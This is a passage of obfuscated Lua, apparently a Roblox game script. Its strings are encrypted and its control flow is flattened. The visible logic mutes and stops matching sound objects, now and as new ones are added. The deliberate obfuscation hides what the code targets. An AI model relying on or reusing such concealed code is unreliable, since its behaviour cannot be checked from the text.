						if v248:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\254\232\8\245\30", "\122\173\135\125\155")) then
							TABLE_TableIndirection["FlatIdent_7517F%0"] = 0;
							TABLE_TableIndirection["v253%0"] = nil;
							while true do
								if (0 == TABLE_TableIndirection["FlatIdent_7517F%0"]) then
									TABLE_TableIndirection["v253%0"] = 738 - (542 + 196);
									while true do
										if ((0 - 0) == TABLE_TableIndirection["v253%0"]) then
											v248.Volume = 0 + 0;
											v248:Stop();
											break;
										end
									end
									break;
								end
							end
						end
					end
					break;
				end
			end
		end
	elseif (v194 and v194:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\183\206\21\183\59", "\168\228\161\96\217\95\81"))) then
		if v19(v194.Name, TABLE_TableIndirection["v8%0"]) then
			TABLE_TableIndirection["FlatIdent_43BEE%0"] = 0;
			TABLE_TableIndirection["v249%0"] = nil;
			while true do
				if (0 == TABLE_TableIndirection["FlatIdent_43BEE%0"]) then
					TABLE_TableIndirection["v249%0"] = 0 + 0;
					while true do
						if (TABLE_TableIndirection["v249%0"] == (0 + 0)) then
							v194.Volume = 0 - 0;
							v194:Stop();
							break;
						end
					end
					break;
				end
			end
		end
	end
end
TABLE_TableIndirection["v25%0"] = TABLE_TableIndirection["v5%0"]:WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\235\221\47\69\42\69\252\196\39", "\55\187\177\78\60\79"), 5);
for v195, v196 in TABLE_TableIndirection["v25%0"]:GetDescendants() do
	v24(v196);
end
TABLE_TableIndirection["v25%0"].DescendantAdded:Connect(v24);
